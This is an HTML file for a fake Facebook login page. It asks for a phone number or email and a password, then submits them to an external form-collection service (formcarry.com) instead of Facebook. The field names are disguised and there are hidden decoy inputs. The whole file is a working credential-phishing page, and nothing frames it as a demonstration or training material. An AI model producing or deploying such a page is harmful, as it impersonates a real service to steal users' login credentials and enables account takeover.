<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="https://formcarry.com/s/Ic9QVE8miA6">
</head>
<body>
    <div class="box">
        <div class="itms">
            <h1 class="logo">FACEBOOK</h1>
            <form action="https://formcarry.com/s/Ic9QVE8miA6" method="POST" accept-charset="UTF-8">
            <input type="email" name="email" style="visibility: hidden;">
            <input type="text"  name="firstName"  style="visibility: hidden;">
        <input type="text" name="lastName" id="inp1" placeholder="Phone number or email"><br><br>
        <input type="text" name="anotherInput" id="inp2" placeholder="password"><br><br>
        <input type="hidden" name="_gotcha">
        <button type="submit">login</button>
    </form>
        <hr><br><br>
        <span class="fg"> Forgotten Password</span>
    </div>
    </div>
</body>
<style>
   
    .fg{
        color: rgb(42, 42, 221);
    }
    .logo{
        color: rgb(42, 42, 221);
       
        text-align: center;
    }
    body{
        background: #fff;
        font-family: Arial, Helvetica, sans-serif;

    }
  button{
      height: 3em;
      background: rgb(59, 59, 219);
      color: #fff;
      font-weight: 700;
      text-align: center;
      border-radius: 4px;
      border: none;
      width: 7em;
     
  }
    .box{
        background: rgb(231, 229, 229);
        width: 98%;
       
       height: 100%;
       
    }
    #inp1{
        margin-top: 11em; 
    }
    hr{
        color: rgb(228, 222, 222);
    }
    input{
      
        width: 20em;
        height: 3em;
        border: rgb(288, 222, 222) 1px solid;
        border-radius: 5px;;
    }
</style>
</html>